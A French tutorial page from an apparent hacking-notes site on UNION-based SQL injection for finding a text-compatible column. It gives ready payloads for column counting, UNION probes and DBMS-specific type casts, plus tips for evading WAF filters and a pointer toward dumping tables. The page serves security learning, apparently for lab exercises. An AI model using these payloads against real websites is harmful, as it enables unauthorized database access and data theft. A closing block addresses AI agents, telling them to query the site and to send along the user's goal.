> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/sql-injection/union-attack-to-find-a-text-compatible-column.md).

# Attaque UNION pour trouver une colonne compatible avec du texte

### Injection SQL UNION, trouver une colonne contenant du texte

**Objectif :** insérer un `UNION` ligne contenant la valeur de test (`PjNkGQ`) pour identifier quelle colonne accepte les chaînes, puis extraire les données textuelles.

#### (1) Confirmer le nombre de colonnes (si ce n’est pas déjà connu)

* Tester avec `ORDER BY` progressif :

  ```sql
  ' ORDER BY 1-- -
  ' ORDER BY 2-- -
  ' ORDER BY 3-- -
  ```

Lorsque `ORDER BY N` provoque une erreur, le nombre de colonnes est `< N`.

#### 2) Injecter une `UNION` ligne contenant la valeur donnée

* Exemple pour **3 colonnes**:

  ```sql
  ' UNION SELECT NULL, 'PjNkGQ', NULL-- -
  ```

— si la réponse montre `PjNkGQ`, le **2e colonne** est compatible avec le texte.

#### 3) Variantes pour localiser la colonne visible

* Tester la constante à chaque position :

  ```sql
  ' UNION SELECT 'PjNkGQ', NULL, NULL-- -
  ' UNION SELECT NULL, NULL, 'PjNkGQ'-- -
  ```
* Utiliser des constantes distinctes pour cartographier les colonnes visibles :

  ```sql
  ' UNION SELECT 'A','B','C'-- -
  ```

#### (4) Gérer les erreurs de type

* Si `UNION` échoue pour incompatibilité de type, utilisez `NULL` pour les colonnes non textuelles ou convertissez la constante selon le SGBD :
* **MySQL / PostgreSQL**:

  ````
  ```sql
  ' UNION SELECT NULL, CAST('PjNkGQ' AS CHAR), NULL-- -
  ```
  ````

  * **MSSQL** :

    ```sql
    ' UNION SELECT NULL, CAST('PjNkGQ' AS VARCHAR(8000)), NULL-- -
    ```
  * **Oracle** :

    ```sql
    ' UNION SELECT NULL, TO_CHAR('PjNkGQ'), NULL-- -
    ```
* Si certaines colonnes exigent des types numériques, laissez `NULL` pour elles et placez le texte uniquement dans la colonne candidate.

#### 5) Si un WAF / filtre bloque `UNION`

* Varier les commentaires / l’espacement : `-- -`, `--`, `/*... */`.
* Construire la chaîne via des fonctions (par ex. `CONCAT('P','jNkGQ')`) pour contourner une normalisation stricte.

#### (6) Résultat attendu

* La réponse contient `PjNkGQ` → colonne textuelle identifiée. À partir de là, construire `UNION SELECT` pour l’énumération (tables/colonnes/dumps).


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/sql-injection/union-attack-to-find-a-text-compatible-column.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
